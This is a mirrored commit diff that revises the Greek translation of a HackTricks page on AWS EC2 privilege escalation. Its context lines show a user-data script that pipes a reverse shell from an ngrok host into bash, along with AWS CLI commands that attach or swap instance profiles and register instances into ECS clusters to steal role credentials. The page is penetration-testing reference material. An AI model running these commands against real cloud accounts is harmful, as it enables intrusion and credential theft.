mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2026-02-05 19:32:24 -08:00
Translated ['src/pentesting-cloud/aws-security/aws-privilege-escalation/
This commit is contained in:
@@ -30,7 +30,7 @@ echo '#!/bin/bash
|
||||
curl https://reverse-shell.sh/4.tcp.ngrok.io:17031 | bash' > /tmp/rev.sh
|
||||
|
||||
aws ec2 run-instances --image-id <img-id> --instance-type t2.micro \
|
||||
--iam-instance-profile Name=E<instance-profile-name> \
|
||||
--iam-instance-profile Name=<instance-profile-name> \
|
||||
--count 1 \
|
||||
--user-data "file:///tmp/rev.sh"
|
||||
```
|
||||
@@ -40,11 +40,11 @@ aws ec2 run-instances --image-id <img-id> --instance-type t2.micro \
|
||||
../aws-services/aws-security-and-detection-services/aws-guardduty-enum.md
|
||||
{{#endref}}
|
||||
|
||||
**Πιθανές Επιπτώσεις:** Άμεσο privesc σε οποιονδήποτε ρόλο EC2 συνδεδεμένο με υπάρχοντα προφίλ παρουσίας.
|
||||
**Πιθανές Επιπτώσεις:** Άμεσο privesc σε οποιονδήποτε EC2 ρόλο συνδεδεμένο με υπάρχοντα προφίλ παρουσίας.
|
||||
|
||||
#### Privesc σε ECS
|
||||
|
||||
Με αυτό το σύνολο δικαιωμάτων θα μπορούσατε επίσης να **δημιουργήσετε μια παρουσία EC2 και να την καταχωρίσετε μέσα σε ένα ECS cluster**. Με αυτόν τον τρόπο, οι **υπηρεσίες** ECS θα **εκτελούνται** μέσα στην **παρουσία EC2** όπου έχετε πρόσβαση και στη συνέχεια μπορείτε να διεισδύσετε σε αυτές τις υπηρεσίες (δοχεία docker) και να **κλέψετε τους ρόλους ECS που είναι συνδεδεμένοι**.
|
||||
Με αυτό το σύνολο δικαιωμάτων θα μπορούσατε επίσης να **δημιουργήσετε μια EC2 παρουσία και να την καταχωρίσετε μέσα σε ένα ECS cluster**. Με αυτόν τον τρόπο, οι **υπηρεσίες** του ECS θα **εκτελούνται** μέσα στην **EC2 παρουσία** όπου έχετε πρόσβαση και στη συνέχεια μπορείτε να διεισδύσετε σε αυτές τις υπηρεσίες (docker containers) και να **κλέψετε τους ECS ρόλους που είναι συνδεδεμένοι**.
|
||||
```bash
|
||||
aws ec2 run-instances \
|
||||
--image-id ami-07fde2ae86109a2af \
|
||||
@@ -65,7 +65,7 @@ echo ECS_CLUSTER=<cluster-name> >> /etc/ecs/ecs.config;echo ECS_BACKEND_HOST= >>
|
||||
aws-ecs-privesc.md
|
||||
{{#endref}}
|
||||
|
||||
Εάν **δεν μπορείτε να δημιουργήσετε μια νέα instance** αλλά έχετε την άδεια `ecs:RegisterContainerInstance`, μπορεί να είστε σε θέση να καταχωρήσετε την instance μέσα στο cluster και να εκτελέσετε την σχολιασμένη επίθεση.
|
||||
Εάν **δεν μπορείτε να δημιουργήσετε μια νέα instance** αλλά έχετε την άδεια `ecs:RegisterContainerInstance`, μπορεί να μπορείτε να καταχωρήσετε την instance μέσα στο cluster και να εκτελέσετε την σχολιασμένη επίθεση.
|
||||
|
||||
**Πιθανές Επιπτώσεις:** Άμεσο privesc σε ρόλους ECS που συνδέονται με εργασίες.
|
||||
|
||||
@@ -92,7 +92,7 @@ aws ec2 associate-iam-instance-profile --iam-instance-profile Name=<value> --ins
|
||||
|
||||
Με αυτές τις άδειες είναι δυνατόν να αλλάξετε το προφίλ instance που σχετίζεται με μια instance, οπότε αν η επίθεση είχε ήδη πρόσβαση σε μια instance, θα είναι σε θέση να κλέψει διαπιστευτήρια για περισσότερους ρόλους προφίλ instance αλλάζοντας αυτό που σχετίζεται με αυτήν.
|
||||
|
||||
- Αν **έχει ένα προφίλ instance**, μπορείτε να **αφαιρέσετε** το προφίλ instance (`ec2:DisassociateIamInstanceProfile`) και να **συσχετίσετε** το.
|
||||
- Αν **έχει ένα προφίλ instance**, μπορείτε να **αφαιρέσετε** το προφίλ instance (`ec2:DisassociateIamInstanceProfile`) και να **συνδέσετε** το νέο.
|
||||
```bash
|
||||
aws ec2 describe-iam-instance-profile-associations --filters Name=instance-id,Values=i-0d36d47ba15d7b4da
|
||||
aws ec2 disassociate-iam-instance-profile --association-id <value>
|
||||
@@ -231,7 +231,7 @@ ssh -i /tmp/priv $INSTANCE_ID.port0@serial-console.ec2-instance-connect.eu-west-
|
||||
```
|
||||
Αυτή η μέθοδος δεν είναι τόσο χρήσιμη για privesc καθώς χρειάζεται να γνωρίζετε ένα όνομα χρήστη και έναν κωδικό πρόσβασης για να την εκμεταλλευτείτε.
|
||||
|
||||
**Πιθανές Επιπτώσεις:** (Πολύ μη αποδεδειγμένο) Άμεσο privesc στους ρόλους IAM EC2 που είναι συνδεδεμένοι σε εκτελούμενες παρουσίες.
|
||||
**Πιθανές Επιπτώσεις:** (Πολύ δύσκολα αποδεικνύεται) Άμεσο privesc στους ρόλους IAM EC2 που είναι συνδεδεμένοι σε εκτελούμενες παρουσίες.
|
||||
|
||||
### `describe-launch-templates`,`describe-launch-template-versions`
|
||||
|
||||
|
||||
Reference in New Issue
Block a user